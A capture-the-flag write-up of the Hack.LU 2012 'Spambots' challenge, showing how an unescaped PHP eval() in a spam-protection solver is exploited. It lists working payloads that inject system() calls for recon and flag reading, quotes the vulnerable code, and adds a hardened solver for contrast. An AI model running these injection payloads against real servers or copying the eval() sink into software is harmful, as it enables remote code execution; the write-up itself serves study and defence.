Filed under Hack.LU 2012.

The trick here was to spot the vulnerability. The script loads HTML from an attacker-controlled web page with @file_get_contents(). It then parses that HTML with a regex, looking for a form containing a basic math problem, and solves the problem with an unescaped eval(). Finally it submits a POST request back to the controlled page, again with file_get_contents().

With that information, gathered by observing the process, we can submit a link to a page whose spam-protection field contains PHP instead of a plain math problem and get code execution. Since we did not know where the key was on the system, we had to run a few recon commands to find it. All it takes is hosting a form with some data.

This was the sample order. Each payload starts with 1+1 so the regex still matches and the is_numeric() check still passes; system() writes the command's output straight into the response, while $var only receives the exit status:

1+1;
system("pwd", $var);
echo($var);
output: /var/www/spambot/

1+1;
system("ls", $var);
echo($var);
output: index.php

1+1;
system("ls /var/www/", $var);
echo($var);
output: spambot directory, guestbook directory

1+1;
system("ls /", $var);
echo($var);
output: normal Linux files and: 6f170bcecda1ca8d3a5435591202988881b34bad

1+1;
system("cat /6f170bcecda1ca8d3a5435591202988881b34bad", $var);
echo($var);
output: the flag is OMG_EVAL_IS_EVIL_SPAM

The following code was taken from index.php afterwards (the backslashes in the string literals and the leading regex delimiter had been stripped in the original rendering and are restored here):
preg_match("/(.*[0-9].*[-+*].*)/Ui", $data, $secret);
$protection = $secret[1];
echo "[*] found spam protection: ".$protection."\n";
// $protection is interpolated into PHP source and executed
eval("\$solution = $protection;");

if(!is_numeric($solution)) {
die("[-] solution not numeric\n");
}

echo "[+] solved (".$spamField."): ".$solution."\n";

eval() runs whatever PHP source it is given. Since the regex hands us complete control over the $protection variable, we can append arbitrary statements, call system() to run shell commands on the server, and print out the key.
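As an added example (not the challenge's index.php and not the write-up author's code), the injection sink described above is shown next to a solver that never evaluates attacker text. The function names, the whitelist regex and the sample inputs are my own; the vulnerable function is a simplified reconstruction that takes the already extracted spam-protection text rather than reproducing the challenge's regex.

```php
<?php
// Added example, not code from the challenge or the write-up.

// Vulnerable sink (simplified reconstruction of the pattern in the write-up):
// $protection is interpolated into PHP source and executed, so a field such as
// "1+1; system('id');" both passes is_numeric() and runs system('id').
function solve_with_eval(string $protection)
{
    eval("\$solution = $protection;");
    return is_numeric($solution) ? $solution : null;
}

// Hardened solver: accept only "<int> <op> <int>", compute it through a fixed
// operator table, and reject everything else instead of executing it.
function solve_safely(string $field): ?int
{
    // Anchored whitelist: bounded integers, one of three operators, nothing else.
    if (!preg_match('/^\s*(\d{1,9})\s*([-+*])\s*(\d{1,9})\s*$/', $field, $m)) {
        return null;
    }
    $a = (int) $m[1];
    $b = (int) $m[3];
    switch ($m[2]) {
        case '+': return $a + $b;
        case '-': return $a - $b;
        case '*': return $a * $b;
    }
    return null; // unreachable: the regex only admits the three operators above
}

// Constructed inputs: a legitimate challenge and the injection shape from the write-up.
$benign  = '1+1';
$payload = '1+1; system("id", $rc); echo($rc);';

var_dump(solve_safely($benign));
var_dump(solve_safely($payload));
// solve_with_eval($payload) would run system("id"); it is deliberately not called here.
```

solve_safely('1+1') returns 2, while the payload returns null because the anchored regex fails on the semicolon and everything after it; the same payload handed to solve_with_eval() would execute system("id") while still producing a numeric $solution.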

Spambots

Credit: Alex Lynch